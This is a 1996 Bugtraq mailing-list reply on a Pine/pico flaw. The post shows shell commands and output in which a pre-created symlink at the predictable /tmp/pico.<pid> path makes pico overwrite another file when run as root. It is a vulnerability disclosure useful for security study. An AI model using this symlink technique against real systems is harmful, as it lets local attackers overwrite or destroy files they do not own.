Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: [linux-security] Pine security problem
From: ranaur () rdc puc-rio br (Ranaur, the Elven Warlock!)
Date: Thu, 12 Sep 1996 22:09:59 -0300


On Thu, 12 Sep 1996, Pascal A. Dupuis wrote:

I tried with my system, running Pine3.95 on Linux 2.0.18.
A) I started composing a message, invoqued the alternate editor (with
Linux and a french keyboard, the command is ^), ??? ). From another login
name, I do :
  cd /tmp
  ln -s pico.pid hacker.tmp
  more hacker.tmp -> permission denied !
B) I started the other way :
  first, from the other login
  ln -s hacker.tmp pico.pid
Then, start composing a message. Invoquing the alternate command resulted
in the error message : "Problem creating pico temp file", and I was unable
to use the alternate editor.
On the Linux system, the /tmp/pico.pid file is created 600, owned by the
Pine user. At first glance, this should be safe, isn't it ?

        No.

        I run it on  PINE 3.91 ... see on ... (sorry, I runned it as root ;)

root () galadriel:/tmp# ln -s t pico.238
root () galadriel:/tmp# touch t 
root () galadriel:/tmp# chown 666 t
root () galadriel:/tmp# ls -l
lrwxrwxrwx   1 root     root            1 Sep 12 22:00 pico.238 -> t*
-rw-rw-rw-   1 root     root            0 Sep 12 22:01 t*
        (runned pine (with ranaur) ... answering this message and ^_ to 
it ... ;)

        so ... abracadabra ...

-rw-rw-rw-   1 root     root         2366 Sep 12 22:06 t

        Well ... it's a problem ... if the evil guy is smart enough he 
can check the root running pine and trash a file in the system ... (the 
odds are few, but , let me be paranoid ;) )

        Any sugestions?

    Ainur ¬Ča Valar!
        Ranaur

         . . . . . . . . . . . . . . . . . . . . . . . . . .
            . . . . . . Ranaur, the Elven Warlock ! . . . . . .
               . . E-mail ranaur () rdc puc-rio br ranaur () usa net . .
            . . Look! . http://venus.rdc.puc-rio.br/ranaur/ . .
         . . . . . . . . . . . . . . . . . . . . . . . . . .



  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]